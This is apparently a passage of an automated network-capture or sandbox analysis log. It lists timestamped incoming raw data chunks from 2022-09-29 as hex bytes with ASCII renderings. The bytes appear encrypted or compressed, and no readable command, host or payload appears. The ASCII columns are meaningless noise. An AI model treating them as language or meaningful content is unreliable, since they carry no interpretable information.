                                                                                                                                                    2022-09-29 12:59:14 UTC23751INData Raw: 11 6a 8f 6a a0 e6 c2 41 93 3d 1b 4e d4 a9 ff 69 53 ca 1f a9 8c d6 9e 85 bf e4 86 db 7c b0 fe cd 28 59 cf 4b 7a 9e 05 36 1c c1 ca fb b3 8b b6 4e 79 ea 70 fd 97 30 85 50 a2 8d 81 8b ce 88 e7 4a 5a 6b 89 42 48 a5 e2 bb e0 aa 10 90 b3 ab bb f1 3c 69 40 13 6e 1c 57 b0 5e 70 5b 5a 44 44 5a 55 05 8c 11 b4 48 29 11 38 84 32 a4 f3 95 fc 6c a1 60 65 d4 da bd f4 f6 58 6b e5 5f 88 5b 3d 0c 07 70 a4 2e 6e cf fd d7 4a 02 4e 7d f1 47 59 9b de 66 84 08 ef 2f 41 f8 40 8f 68 3f df 7a 93 c6 db 15 c7 f8 c4 9c af c4 45 85 4c b7 2c 9c 4f 85 04 b3 07 b3 6c 3f 67 f7 15 18 03 7d 6d b2 e6 6e 8c 83 9a 14 99 6b 04 e2 d2 a8 88 fd 4b 58 20 99 1b 0d 2e b6 3a e5 69 b5 cd 6e ed 2b e1 53 05 18 d8 52 ff f7 b8 cc 24 8b 25 65 d6 09 97 0a 6c 51 13 4a ab 07 31 43 04 20 9b 41 8e 0b 5c 86 29 1b
                                                                                                                                                    Data Ascii: jjA=NiS|(YKz6Nyp0PJZkBH<i@nW^p[ZDDZUH)82l`eXk_[=p.nJN}GYf/A@h?zEL,Ol?g}mnkKX .:in+SR$%elQJ1C A\)
                                                                                                                                                    2022-09-29 12:59:14 UTC23767INData Raw: c4 06 5b ee fa 43 4f 7e 57 3e de 0b 0c 1f c8 7c 77 d7 47 dd f9 b8 9e 98 8f 4a fc 0e d7 3c d6 ed ce a8 fd bb b9 e9 64 2c d9 a8 55 da f3 6e f8 5e e7 80 ca 57 ed 60 56 34 29 c0 13 da d5 1d b4 b4 f9 4f d6 c2 e8 f3 0a ff 15 e5 2c e5 7c 2a 3b d9 bf a2 c1 b4 4b c6 5d 6f b8 ec 10 f0 17 83 84 a0 72 09 15 2f 09 01 8b 30 af 6c b0 d3 85 37 5b 1f d8 10 f9 50 e0 f1 32 11 fb 58 8c 5e c4 e7 5e a5 6c 58 9e 30 4f a5 a5 6d ec f3 59 b5 c8 d8 bc b9 94 c7 d5 46 b8 ef 23 cd 06 44 84 74 27 bb 1c df ce cd 77 bf 5c 2c 9f 3b 22 81 2b 49 a6 4f 52 49 63 28 18 8b f3 22 6d 2e e4 71 3a c0 9b d0 2a dc da 44 d3 e6 07 7e d9 9a ad 22 84 75 55 b5 22 18 c1 1a e6 e7 d0 19 36 78 db b5 a1 eb 7f b0 48 9a 1f 9f 2f cb 85 4c f2 80 41 44 51 71 d6 48 cc 5c f2 54 bc 22 ca c8 f7 86 0b 2f 5e 14 91 de 0e
                                                                                                                                                    Data Ascii: [CO~W>|wGJ<d,Un^W`V4)O,|*;K]or/0l7[P2X^^lX0OmYF#Dt'w\,;"+IORIc("m.q:*D~"uU"6xH/LADQqH\T"/^
                                                                                                                                                    2022-09-29 12:59:14 UTC23783INData Raw: b6 4f f5 8a b8 e4 4d ab 32 2a 76 05 af 5c 76 eb d9 10 7f fd 02 12 58 bd 43 24 36 25 da e9 9b ef 27 77 0f 54 59 29 fe 5e 45 1c ad 16 79 b0 df b3 e8 8f 07 93 4f 82 3b ba fd 56 5e 82 47 34 a6 bd 1a 31 36 6f 6a 01 79 1f a9 c0 fc 10 e3 e7 3d 0f fd 78 5e a8 9f e8 0b 55 71 0b fa 89 04 2a 94 08 ed 5c be 9e eb 0d 6f e7 95 c7 32 8e 7d f9 2d b9 a9 95 2a a6 ad 7a 68 a6 88 5d ba 85 79 85 85 1d a0 66 b8 45 e3 e9 30 f1 0d 62 e8 28 23 1d 2e 74 35 8a 4a bd e4 dc e1 fd d6 7a 57 28 fd d5 8d 88 c9 fd 18 31 3b 2b 41 fb 27 30 8f 79 ba be 2e 87 54 c4 31 e0 82 55 2f d7 c6 48 0e cc 04 34 bf a6 3b 0f bd 2e 40 72 98 14 7f e7 a5 35 b3 95 8a 1a b9 93 de be 0c d2 a2 7d ec 23 91 74 92 69 fe 7e f4 21 df 09 73 2e 7c b4 e8 01 49 0b 07 53 d3 54 4e 32 06 ad f5 29 1c 9d 16 07 2c 86 d1 0d 22
                                                                                                                                                    Data Ascii: OM2*v\vXC$6%'wTY)^EyO;V^G416ojy=x^Uq*\o2}-*zh]yfE0b(#.t5JzW(1;+A'0y.T1U/H4;.@r5}#ti~!s.|ISTN2),"
                                                                                                                                                    2022-09-29 12:59:14 UTC23799INData Raw: c9 68 e7 a5 df 43 39 10 9c 7a d4 69 2d 60 ff 22 cd c3 5d 38 e5 38 a5 f0 89 4a 1f dd 95 8b de 00 00 29 b2 e1 b0 e8 21 d6 d5 f9 cf 2c 7a 2d 25 02 a7 39 58 18 6d 75 09 6e 58 b6 c2 d8 76 b6 39 c7 88 b4 95 d2 6d f3 42 16 c2 31 f3 78 a2 2f c0 ce 92 4a 0a 88 7d b7 fd f3 42 3a 25 53 85 e6 e6 52 ec 88 98 a6 69 86 56 97 13 e6 2b 0f 53 18 7e 2d d5 8c 99 32 ef dd 1d e9 9d a0 2c a8 9b 27 9f ca 15 42 20 58 97 97 f0 6d bf 71 a2 65 0c 49 d6 62 d0 16 07 ea 03 26 15 b8 0f 4c 45 5c 0b 83 9b 17 7b d3 fe e5 c5 3a 41 b3 cb 4f 17 05 ac f0 de 20 dc 4d cb 79 eb f1 30 08 2d 69 e6 e5 68 fd f1 69 e8 88 b8 77 28 c3 23 9a bd d5 de 85 a9 58 fe 4f 8d 71 58 3e d4 c9 49 a6 d5 a2 5b 9f a6 a0 0e dc 75 8e 49 7e c9 0d b9 66 f4 8d 01 d0 1b 9f 0f 5a a3 e5 04 df ea 65 72 73 25 33 42 a7 f6 c5 07
                                                                                                                                                    Data Ascii: hC9zi-`"]88J)!,z-%9XmunXv9mB1x/J}B:%SRiV+S~-2,'B XmqeIb&LE\{:AO My0-ihiw(#XOqX>I[uI~fZers%3B
                                                                                                                                                    2022-09-29 12:59:14 UTC23815INData Raw: 00 2d 0c ea 38 ba d3 a2 5a 0e 19 e7 c8 71 c4 00 89 97 b5 44 52 77 7f 28 5b 96 0f d8 6c 17 09 b9 ba 18 c8 aa d9 ba f0 01 84 c3 b5 1b 8b fe a3 7b 94 e7 59 65 52 f4 cc 41 67 7d 59 1f 64 bf 65 93 11 6b 67 a9 0f 1d 55 7d 29 6d d4 7a 08 2e 70 31 db 23 ab 8a 20 96 31 52 4a a5 ba e8 04 aa d2 e9 25 5e 03 5f fd ba f1 b6 87 68 92 a8 0a 59 e4 6c 42 87 44 5b 37 83 27 2d 5f 0c a8 e5 e6 d3 b8 ff c3 50 5b 52 20 e5 d0 57 39 62 8f 63 cf 5c c0 cf d1 ec e8 fb 75 37 de a0 11 f1 2d 8b 1f 09 a5 2c de 8e 0a 62 19 4a ce 8b 41 44 77 39 5d 0d 46 ed 63 04 07 09 3b 6c 6f e5 d2 49 46 68 aa 13 2d e9 11 b5 d4 ef ae 0f 29 69 92 1e 91 3a d6 db b1 42 fb 26 9c c1 6e 66 d9 ca 00 8d 10 b0 fb 81 04 69 ff 5d bf b2 87 98 1b e5 d4 7f 62 bd 08 70 37 4c 01 da 79 75 26 31 47 c9 15 97 26 77 17 7f b2
                                                                                                                                                    Data Ascii: -8ZqDRw([l{YeRAg}YdekgU})mz.p1# 1RJ%^_hYlBD[7'-_P[R W9bc\u7-,bJADw9]Fc;loIFh-)i:B&nfi]bp7Lyu&1G&w
                                                                                                                                                    2022-09-29 12:59:14 UTC23831INData Raw: 53 a7 71 2c 19 7f b7 7a 77 93 34 9a 60 3d 4c 8c 6f a0 0a 72 f2 0c c2 c0 ef d4 1c 79 ef fd b7 e0 35 12 a3 02 ce a4 b3 20 dc fa ed 89 98 c9 8f 83 be f1 89 6e 71 67 eb ac d1 d8 84 90 af 70 3a 9a c2 6f c0 09 a4 a1 e7 30 cb 63 0f 52 6e 55 56 2d 94 dc ff 2f 45 f5 7d b0 c5 3a 22 05 f4 07 03 b6 f9 13 44 b7 f2 94 6a 81 1c e2 68 bd 93 97 12 0a b1 76 a1 43 d8 bf ed 31 e0 58 58 76 4d 9a 86 16 00 e8 e2 91 08 65 2d ff 84 4c 61 f9 eb c4 08 ac fc b3 67 0e 0a 37 d8 52 25 f8 d3 2e a2 1e 91 a4 15 a3 5a 37 a5 c2 f2 bc c4 9f be 4b 66 d6 f5 d3 72 0d 82 1f 04 14 a3 21 41 bc a4 ff 26 b4 45 7a dd 38 cf 32 4f ff 3f f3 97 25 39 93 00 e9 cc 94 53 88 a2 6d 3e 1d 37 b7 f4 45 47 72 4b ee f8 6c 48 b9 7b 62 74 49 c0 b8 42 04 35 14 cc 1d ed 5c e0 14 9b 37 9c b3 5c 65 aa 31 a0 23 c2 39 89
                                                                                                                                                    Data Ascii: Sq,zw4`=Lory5 nqgp:o0cRnUV-/E}:"DjhvC1XXvMe-Lag7R%.Z7Kfr!A&Ez82O?%9Sm>7EGrKlH{btIB5\7\e1#9
                                                                                                                                                    2022-09-29 12:59:14 UTC23847INData Raw: 28 47 c3 33 b5 ca f6 ea fb 86 51 ec 60 ff 22 1b d8 a5 79 a0 8a e8 19 c7 37 d4 22 57 21 fd d7 ba db 2f b1 f7 8d 66 0c 2f 23 70 86 d2 b2 05 3b 9b 46 a0 62 eb 5c fc ec d4 7a 10 d7 84 e8 6b 72 58 bd c9 d8 13 1d b5 3a 98 fe 65 8d 1d 04 1b e7 64 3d ac db 92 c5 ab eb 49 99 4b 10 93 33 c3 04 46 af 9f 8e d7 83 cf 86 c9 44 f6 8c 57 e7 6c 7d 2e be d9 34 cd 1a 5d b5 7d bd 90 5f f1 5d d8 ca 1f ec 30 3e f8 f5 2d b7 53 86 78 a9 fe 92 73 4b 2d 0b 6a c5 89 9b 38 4b e7 bd 3e a9 ed 42 b1 fb aa 25 88 fd c3 41 ef 2c c1 0d 89 e3 70 64 14 e4 c1 8c df 8a d4 ec 99 f6 59 32 0f c6 18 89 58 b6 17 88 20 5b 0a 22 ba b6 d3 95 72 e7 6a 10 5b ff 99 8e 25 2c 12 50 2a bf dc 58 a0 de 5f 1d fb 1e 37 38 bd 9d 71 a8 b5 e6 e1 d7 82 de 6b 44 9d fe 1b df fe 11 12 10 41 2e 77 c8 dd 02 70 6b 77 97
                                                                                                                                                    Data Ascii: (G3Q`"y7"W!/f/#p;Fb\zkrX:ed=IK3FDWl}.4]}_]0>-SxsK-j8K>B%A,pdY2X ["rj[%,P*X_78qkDA.wpkw
                                                                                                                                                    2022-09-29 12:59:14 UTC23863INData Raw: b6 80 cb 9d 03 f4 97 0d a9 94 93 5f 0c 23 90 21 68 59 97 40 72 4e 83 3c 5e f0 ef 2c 12 5b ec 0e 1d 8c 4d 23 02 27 11 44 20 cc 3f ce 88 50 b3 32 56 98 a9 c5 62 d8 c1 31 ac fc 11 91 6b 57 6b 2d 96 b8 15 88 fd 77 b7 ac d0 e1 d6 85 37 6c 3d 56 71 fb ef 48 17 f4 cf 1f 7a 44 ba 69 cb cc e7 5b 3c 75 2e f5 a5 00 3e ac 71 c1 69 f6 5b 5e bd e9 80 d4 26 96 ce f8 5d 86 f0 ea c5 01 bd 0e f5 45 52 5c 10 74 40 fb 9c ae fb 96 97 04 5b b7 c2 5b 55 1e 0a c5 45 2a 55 6c 4a 51 cf 2e d9 7f d2 11 d5 29 b0 45 ec 84 09 6e cf 36 c5 93 2f 6a b8 6f c8 ff dd 56 12 cb 93 6e 53 04 e7 2f 7b 7d 9b a4 e1 a4 f9 3d 0d 47 d6 c6 0d fb 51 7a 81 39 25 77 8b c7 93 3b 79 6b be 9a 28 70 76 24 db eb 9c ee ac 12 8d 65 af e1 b3 16 e3 a2 e3 d4 77 cc 04 0f ca b3 67 1e c5 b4 b6 90 07 68 12 44 9f 6d 90
                                                                                                                                                    Data Ascii: _#!hY@rN<^,[M#'D ?P2Vb1kWk-w7l=VqHzDi[<u.>qi[^&]ER\t@[[UE*UlJQ.)En6/joVnS/{}=GQz9%w;yk(pv$ewghDm
                                                                                                                                                    2022-09-29 12:59:14 UTC23879INData Raw: 4b 07 1a 36 fc 15 bb 9e 0a 52 2c ff 4d d0 d7 0c 42 0c bb 65 61 0d ac 38 ea a3 93 c3 4a bd 3a 2f 78 c3 20 84 d0 98 9c ba b7 31 a9 39 88 06 e6 d2 3a 97 3c 91 ca 86 2f ed e5 d4 e7 5c c1 18 59 06 9d 8d 5b 0c fc 28 31 07 f0 08 1b ff 8b 4a 8c c1 38 e9 fc 36 7e be 95 4f 99 2f 16 06 d1 09 d8 52 34 65 df a0 fc dc 19 08 d0 02 95 cc a7 98 d7 da aa 8b 18 40 ac 4d 3a 49 1f c9 02 48 99 d0 23 5e 78 45 06 6e 06 ee c7 09 d0 cd 09 4d 10 4b c7 f6 3b 28 bb 06 4f 08 27 3e 9d 95 1c c6 72 85 b3 42 2c 93 ca e3 3f 0f 08 7f 62 e1 f6 6d fb 7b a1 3f d4 1d c1 12 08 b8 62 4e ec cf 1d de bd f7 ba 4c 18 58 a0 32 ce b0 60 2f 00 d3 67 03 e1 6e 0d 46 c7 00 b1 1f e4 a1 7d f9 0a a7 07 c6 19 7a e7 c4 8e 03 7c 71 67 85 58 92 4b c0 73 20 f9 b1 ad 16 c1 fd e5 d7 75 e7 c2 77 49 12 e4 4c 23 09 e4
                                                                                                                                                    Data Ascii: K6R,MBea8J:/x 19:</\Y[(1J86~O/R4e@M:IH#^xEnMK;(O'>rB,?bm{?bNLX2`/gnF}z|qgXKs uwIL#
                                                                                                                                                    2022-09-29 12:59:14 UTC23895INData Raw: aa c2 d8 3d 0d 76 64 06 15 01 46 f3 92 b7 b9 14 89 9b 74 80 77 fc 50 8c 6d 73 27 44 9c 2f 58 60 d7 67 46 00 93 bb 8e f7 52 4a 1c 5c af c3 c9 fc ad 02 15 b0 6e 7c 8f c9 eb 1c 2f 92 63 53 e7 36 94 2d 29 c0 73 e0 dd 78 89 c2 e0 13 ba f6 84 1b 4f 9a 77 4b 6b 6d fc 26 2e 50 67 77 f9 54 bb 0f da d7 25 ed 49 c7 2e db fe 19 69 07 fc ce 05 29 6f 67 1d 54 17 bf 92 00 9f a8 82 34 76 0e 38 2f b3 9f 1a 1e 34 09 09 e6 c8 16 7e f3 fe 2a 3c 38 21 7a d3 d8 cf 18 af 5d 15 14 58 cb cc d8 a4 0c 87 cc fb c6 3d 9d c0 74 81 71 7d 29 87 e1 9e 3a 70 ff 25 96 46 6d 6f a5 1b 24 ba 17 c6 fa 17 7b dd 76 b2 29 cf 99 2c f7 61 9c cc 0f 11 bc ff 3c d4 e0 5e 18 d4 82 c8 f2 19 40 b7 2c d9 da ff 59 0d 6e d0 6f 9e ff 82 77 83 c8 26 9e 12 f5 b6 d1 15 a0 d5 1f 5f b5 b7 0e 4d 24 a0 a0 40 f4 0d
                                                                                                                                                    Data Ascii: =vdFtwPms'D/X`gFRJ\n|/cS6-)sxOwKkm&.PgwT%I.i)ogT4v8/4~*<8!z]X=tq}):p%Fmo${v),a<^@,Ynow&_M$@
                                                                                                                                                    2022-09-29 12:59:14 UTC23911INData Raw: 52 8e 9b 22 e0 28 cc c7 6e bb 14 b2 83 46 9f 7d c3 d5 d5 e6 c2 a1 c1 68 6e 65 03 f7 23 d7 0b 65 ab 85 c9 e8 0b d5 53 c9 ff 86 59 aa bc 6a 16 60 80 8a 52 81 f5 cb c8 69 77 04 11 b7 d1 7f 09 24 5d 26 19 1c 3a 92 a4 8b 8f fe 3c 87 1c ab 4f 26 c1 dd f4 b2 fd bc c2 67 a2 49 cd cc 03 f6 4e 66 22 ff f5 6c a3 ba 3f a9 8d e6 04 bb 4d 24 73 c1 3b 35 3f fd d6 5b e4 81 c0 14 a6 96 b3 e4 0b 5c 8d 09 48 39 04 70 e1 c3 cc ae e2 6b 92 9e f1 5f 23 90 df 15 d5 fc 1b 0c 75 8b e9 dd b1 80 dc 7e 5b d7 fd 8f db b1 0d aa ae 5c 1f f7 9d 87 79 e0 79 df 7d 4e 08 76 54 dd e5 61 54 22 a6 64 64 3d f6 85 30 1c 1d bd 6f 87 52 71 56 0b b8 88 92 92 7c 2e c7 a9 21 a3 38 a8 e8 5a 9c 2c 79 f4 b3 d4 71 ff 13 5a 87 8d c9 4f 11 d9 bf 42 23 77 cf f0 9c 2c 78 f4 a3 bc 1b cc b8 74 3e 8c 55 b2 a3
                                                                                                                                                    Data Ascii: R"(nF}hne#eSYj`Riw$]&:<O&gINf"l?M$s;5?[\H9pk_#u~[\yy}NvTaT"dd=0oRqV|.!8Z,yqZOB#w,xt>U
                                                                                                                                                    2022-09-29 12:59:14 UTC23927INData Raw: 09 bb 9e b0 11 75 15 a5 ac 45 5f fa 31 32 40 0e 79 68 50 d9 6d f2 63 f7 ea f5 29 a8 1e 13 cf f8 7f 0a 57 c3 c0 eb 6d 4a 77 0e 1b 4c c5 89 a4 34 b4 3b 53 97 c4 fa 0a 6e 40 5d ec d6 6d a5 35 1c c5 ce 70 4d 5e 7d b5 00 84 24 7a f2 7f 3d 00 d9 3c 84 d4 66 a4 4f e3 70 a6 31 0c ac 3b 34 04 49 78 64 58 a8 b1 5f 28 cd 08 df ac 47 3c b8 f1 91 6c 0d b8 6f 1d 82 0f d1 25 01 3b ac ea 1e c0 9a 24 f4 b6 3c 02 a0 41 d9 1d 9d e0 a2 83 52 f3 26 63 bd 98 01 5f 18 38 67 e4 e1 31 3e d9 6a 99 18 93 03 4c 78 82 28 4e 5a e9 fb d7 e4 fb 45 97 f9 05 3e 60 a1 e5 1d 79 d0 6b 2c 57 b8 4a 3f 61 19 77 76 36 6a 36 ff ff 65 ef 98 da 97 1d 25 94 3b bc 7d 7d 50 37 18 1b ec c6 04 d9 99 1c 7d a8 b3 c1 61 3f d3 29 d9 fc 5e 27 7b f8 09 60 d1 14 e6 0c f7 eb a7 2c 94 63 d0 78 64 f9 e1 85 97 72
                                                                                                                                                    Data Ascii: uE_12@yhPmc)WmJwL4;Sn@]m5pM^}$z=<fOp1;4IxdX_(G<lo%;$<AR&c_8g1>jLx(NZE>`yk,WJ?awv6j6e%;}}P7}a?)^'{`,cxdr
                                                                                                                                                    2022-09-29 12:59:14 UTC23943INData Raw: b1 c2 4b e1 f3 d1 ca 2d 47 60 58 0e 93 cf 16 5b cf e4 7c f3 34 bc 24 85 1b e4 2b d4 63 4f 96 61 75 4b 76 17 92 cf 49 43 85 26 c5 6d df 61 b7 61 1f 20 95 a2 8e aa 8e dd f6 a8 15 27 5e 0f 7b 84 fd 6b c0 ce 92 bd 29 0a d4 34 2e ce 15 2b a8 81 5b eb 8f 40 ee 81 5b 8b 31 24 2c f5 fa 0f 1e ba a8 ea 05 a2 eb 01 b9 a0 42 d6 7b f7 42 c2 ca de a3 c7 0d 2d 60 f8 a3 c3 d8 d6 5a 29 19 9e 04 78 cb b6 0f 94 92 df 53 1d 2d fc 00 a1 48 2c 4f 8f 7c 01 02 d8 b8 0b 49 08 8d 76 a1 e1 c6 7c 81 c9 cd 17 e6 59 04 f2 5d 8f 1e 6a 40 4e da 25 9b 21 76 7d 36 8a 71 2b 29 43 cc 69 b9 23 79 81 3d 4f 6d d8 69 28 db 3c fc eb 19 01 0d 34 cb df 11 dd 92 a6 6b 63 d8 ab 3b 63 4b 7e 9c b6 aa 81 be e8 54 33 bb f6 db ba 4a 08 5a 18 7b d6 f8 30 d9 8e d4 6d ea de 76 24 03 53 62 34 1a 87 0d f6 ef
                                                                                                                                                    Data Ascii: K-G`X[|4$+cOauKvIC&maa '^{k)4.+[@[1$,B{B-`Z)xS-H,O|Iv|Y]j@N%!v}6q+)Ci#y=Omi(<4kc;cK~T3JZ{0mv$Sb4
                                                                                                                                                    2022-09-29 12:59:14 UTC23959INData Raw: b8 75 ee 63 28 e2 c2 0b 91 c3 14 a7 38 df 46 d2 f3 a1 5f 40 bb 11 ff 53 68 0f fe 03 be 1d c6 08 61 ef e1 dd 24 b2 e8 78 73 fc 94 f4 0d da e9 0a 72 25 cb 6b 16 91 6c f2 10 02 f0 de 9d 14 2d 2f a5 47 d1 c0 c9 6a f9 a8 1b 60 dc 90 59 ea a6 2e b6 c4 01 2f fc 39 b2 2b 8f 22 2e b4 00 04 fd 5a 46 a5 17 bf 19 44 4d f1 27 91 ee c7 8d 8a 7d 01 34 b4 7c d5 ea 2a 87 e6 31 42 ee 0d 47 95 6c 8c 47 bd 6f 25 48 bb 81 52 0b a5 24 67 e1 e4 41 e3 cd f3 bd c3 5b 22 93 f3 81 27 86 7c 25 9f 0e 09 b6 ba b4 6b d7 a1 4f cc ab 76 de 14 07 3c e7 be a1 c9 2d 0d 76 ac 3a 11 84 ef 96 ed cf 2f 97 17 e6 44 88 9c a5 bf 8b 06 d8 95 45 60 96 80 74 2a fb 23 bc 34 15 3f 05 01 df 98 63 c3 b5 6f 26 83 9c 7b 44 02 1d 00 b0 bf 40 36 22 dc c0 84 8b 50 dc fd 0e c0 12 11 07 cd af 65 7b d5 a6 49 61
                                                                                                                                                    Data Ascii: uc(8F_@Sha$xsr%kl-/Gj`Y./9+".ZFDM'}4|*1BGlGo%HR$gA["'|%kOv<-v:/DE`t*#4?co&{D@6"Pe{Ia
                                                                                                                                                    2022-09-29 12:59:14 UTC23975INData Raw: b6 e5 7f 2e 39 59 63 6f 2d a7 28 9a 10 59 3e 6d 06 76 2c ba 12 9d d4 a5 fa 59 c9 7d 81 be f4 20 72 4b ad e1 15 19 6b ad cf fa 5b 5c 59 22 57 64 67 3d c5 a7 0c 91 46 9a df aa 51 36 10 67 e8 d1 d3 39 5f 13 0e 13 b6 2f fe 64 bf 81 e9 27 c8 76 10 6e da 4f ca 64 63 71 cc b2 c5 9f 10 44 fb 53 36 e7 bf 62 91 0b 40 46 53 97 1d ab ab e5 fc 88 27 c2 be e4 ea 42 8b 42 f0 17 b1 26 94 d5 42 cf 7c 5d 31 c4 30 bc 51 c5 74 db af 0d 22 8e 4b c1 28 0c ca c3 3b 05 e0 a1 7b 91 f2 5c 61 d5 82 35 fe 5d 53 e7 83 be 5d e0 a7 9a a6 df d3 e4 0b 0c 9f d4 87 15 64 52 23 a8 c5 e5 6f 23 0b 4b 6c 8e 34 d7 82 00 4f 38 63 07 78 b0 2d b6 92 d2 61 3d 2c f4 56 f9 f0 69 15 7d 95 c0 d6 e8 42 af 6c 3b ba c1 49 56 4a a1 ac 9e dd d9 1b 1d 2c e8 02 31 dc d7 7c a3 45 d4 93 3d ac d0 44 43 57 10 1a
                                                                                                                                                    Data Ascii: .9Yco-(Y>mv,Y} rKk[\Y"Wdg=FQ6g9_/d'vnOdcqDS6b@FS'BB&B|]10Qt"K(;{\a5]S]dR#o#Kl4O8cx-a=,Vi}Bl;IVJ,1|E=DCW
                                                                                                                                                    2022-09-29 12:59:14 UTC23991INData Raw: 1b 36 ae 56 95 37 8e 08 ee 41 c6 ee 0d ed be 05 1f 38 e7 95 18 bc ef 0c 68 b5 d3 37 46 ca 64 bb d3 49 e5 14 df 32 72 90 91 92 90 49 89 84 52 17 f6 c4 49 03 c6 c4 cf e8 03 65 de 3d b6 17 31 92 ce 12 d3 4b 12 7b 43 3f ab 16 8d d2 b2 07 b3 24 0a aa 2c fd 2c 8b 01 13 c9 42 15 a0 ea 9a 6e e3 8e 66 65 83 63 91 26 f0 c6 37 33 d0 d1 ce e3 fb 96 ce 4d b1 45 a8 c1 74 f6 23 fa e6 4c 49 3f 49 fe 43 33 08 d8 b7 34 69 cb d2 b7 87 89 fd 87 53 a4 88 14 32 fb 89 63 11 5e 08 2a 7b a6 a8 0c 3e 3b 6a 52 d8 26 66 de cb ed 94 6a 44 fa 94 09 fe 6c dc 7e 34 90 62 ea 3f 8f 86 91 07 29 90 4f cc f5 be 68 ad 4b 9c 71 07 00 b2 cc 2a 4b d6 60 a3 9a 41 1c af 8a 42 5e 5e 51 fc 64 0a f2 61 5b 0c 1b 3a 5a e7 e7 22 78 01 24 a2 11 7f e0 df 96 51 0c fe 62 cd f8 0f 5c e6 d4 52 d1 cd d1 ea a3
                                                                                                                                                    Data Ascii: 6V7A8h7FdI2rIRIe=1K{C?$,,Bnfec&73MEt#LI?IC34iS2c^*{>;jR&fjDl~4b?)OhKq*K`AB^^Qda[:Z"x$Qb\R
                                                                                                                                                    2022-09-29 12:59:14 UTC24007INData Raw: fe 04 a9 81 2d 1a e5 ae c0 5b 9f 25 8f 84 56 dc 41 47 11 c5 9a 2e 88 6c 0b 59 da d5 8d 86 2b 6e be f6 e8 e3 84 26 af c0 e3 42 d6 86 4f 3a f2 68 6f d4 fd 40 ed 72 33 f1 18 3b eb f8 1b 11 07 40 6d fb 68 f0 40 17 c4 9d c0 14 fa 7a fd 5d e2 04 98 0c 2a 92 2a 82 f0 db 41 6a b5 28 71 73 e2 74 be a5 a4 7a eb 3e da fc d9 51 6a cc e2 9e bd 92 1e 3c c5 c1 92 de e7 4c 2e 1b 19 7e 4c 1a 20 ed c5 17 4c 9a a4 cc 8f e4 85 2e 40 44 b4 91 a7 d4 1c 33 17 fe 2b 82 45 ce 7d c8 b6 26 50 b8 eb 1b 31 0b 5c ad f9 2c f0 6a 24 9f 70 2f 3d cb 7c 32 58 05 9a c2 a7 c5 93 86 cc a1 93 f8 46 b9 69 63 98 82 55 29 3a 44 2f b1 04 f9 f6 4f c7 8e c4 5a 3a 6e 4b 35 b5 47 06 0a 5f 35 12 b5 d9 bc 92 a2 dc e9 b5 74 04 19 c5 9c df 9d f3 9b fa fc fc 51 0c b8 a7 8d a7 b4 67 bb 2f 9d 5d b0 3c e2 18
                                                                                                                                                    Data Ascii: -[%VAG.lY+n&BO:ho@r3;@mh@z]**Aj(qstz>Qj<L.~L L.@D3+E}&P1\,j$p/=|2XFicU):D/OZ:nK5G_5tQg/]<
                                                                                                                                                    2022-09-29 12:59:14 UTC24023INData Raw: 16 af e9 be 1c e9 5f 2c 71 97 41 cb 63 be eb 23 c4 7a b1 92 7d 67 be d4 2c d5 f3 2b ef a2 53 26 e5 54 1f 61 49 51 2d 6c 0d 31 e7 c6 82 e1 b7 26 23 8f e2 2f 7b b6 f7 9f e5 d7 56 7f 32 36 47 d1 b8 75 31 a7 fd 18 c7 0e 3c 98 47 ae 4e 3b af d5 b3 3b ea 6d 5d d0 c4 33 7c e1 42 1d 43 66 17 1c 5a df d0 c4 86 64 16 c9 e2 fe 08 24 91 36 b7 e8 c9 72 49 a0 08 ed bc 34 75 ef 1f 1e 2d b2 bc 73 9e 8f c2 91 42 56 ec fc 06 7e 4c 5f ce 59 06 80 7f 0d a6 29 a2 65 28 4c eb 3f 86 24 72 2b 61 15 5f 09 5b aa bb 7a 0a 99 b0 13 6d c4 46 02 86 e3 15 ce 25 15 ff f9 09 7e 61 76 f6 a0 52 5a 12 88 90 a6 5d ed 78 66 a0 78 9d 43 5e 7c 03 74 39 c4 0d f9 09 15 84 e2 a7 16 30 54 79 5b b2 22 85 a2 fb c5 83 c7 a7 36 6d c3 62 96 a5 c0 16 71 11 ce 4e 25 d7 9e 99 d8 b6 20 59 0d 3b be 04 06 29
                                                                                                                                                    Data Ascii: _,qAc#z}g,+S&TaIQ-l1&#/{V26Gu1<GN;;m]3|BCfZd$6rI4u-sBV~L_Y)e(L?$r+a_[zmF%~avRZ]xfxC^|t90Ty["6mbqN% Y;)
                                                                                                                                                    2022-09-29 12:59:14 UTC24039INData Raw: 68 36 38 16 cd 5c f8 6b 50 44 b2 da f7 a8 a4 57 29 fd 94 fc 30 f0 5c ff dd e4 d8 e7 45 e1 8e be 03 0e f0 6e 71 cc 6e 4e 68 e7 85 b9 2a cb 74 9a 72 24 05 2b 10 e9 b6 2b 61 e1 0b 40 41 c3 fc 0a ae 61 5f 56 2b 70 1a 15 34 38 7b 35 32 37 e6 a5 15 aa ae ba 57 13 4d c6 d2 66 0c 31 b9 89 60 53 7d 21 37 1a 21 3a 9d 90 b9 71 26 af cf 59 fb 01 f5 ed 14 1d 49 d7 62 75 6f c8 b0 31 18 c4 9a a6 2d a5 5b 52 67 04 92 8b e3 34 f8 bf e4 e8 e7 4f 16 91 24 0e 4f 49 ab ba 20 f9 f3 eb fd c4 24 c9 7d 19 c4 16 72 e6 0e f7 76 81 ae b7 ae 17 53 c8 da 1f d2 96 41 14 6d b1 da 5d 43 ce 52 44 8e 60 ac 77 42 1d 5f 44 fe aa d2 63 a9 99 f6 3c ac f0 de ca 4b bf 62 b8 9d eb 5e 7c 8c f0 c0 5c 77 e5 2a c9 04 7c 77 98 2f c8 9d e5 6a 5e d0 5f c8 f9 b8 b7 e2 17 de 16 1f 5e 7b e6 f1 2b af 02 76
                                                                                                                                                    Data Ascii: h68\kPDW)0\EnqnNh*tr$++a@Aa_V+p48{527WMf1`S}!7!:q&YIbuo1-[Rg4O$OI $}rvSAm]CRD`wB_Dc<Kb^|\w*|w/j^_^{+v
